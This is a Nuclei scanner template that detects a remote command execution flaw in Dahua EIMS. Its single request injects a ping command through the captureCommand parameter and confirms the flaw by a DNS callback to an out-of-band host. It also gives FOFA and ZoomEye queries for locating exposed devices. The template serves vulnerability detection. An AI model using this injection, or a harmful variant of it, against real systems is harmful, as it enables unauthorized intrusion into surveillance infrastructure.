nuclei-templates/http/vulnerabilities/dahua/dahua-eims-rce.yaml

34 lines
1.1 KiB
YAML

id: dahua-eims-rce
info:
name: Dahua EIMS - Remote Command Execution
author: DhiyaneshDk
severity: critical
description: |
Dahua EIMS capture_handle interface allows remote command execution.
reference:
- https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8EEIMS-capture_handle%E6%8E%A5%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
- https://cn-sec.com/archives/2554372.html
metadata:
verified: true
max-request: 1
fofa-query: "<title>eims</title>"
zoomeye-query: app:"大华 EIMS"
tags: dahua,rce,eims
http:
- method: GET
path:
- "{{BaseURL}}/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: regex
regex:
- "^success$"
# digest: 4a0a0047304502204c8e8f930bb56dc18e15d1246becf227edebef661a92d5db320afc11a1e290030221009c3b72f6ae1afe50d28e4b1bfbc6190ab68dcf37cd5e89f8f7006f19d4f889e1:922c64590222798bb761d5b6d8e72950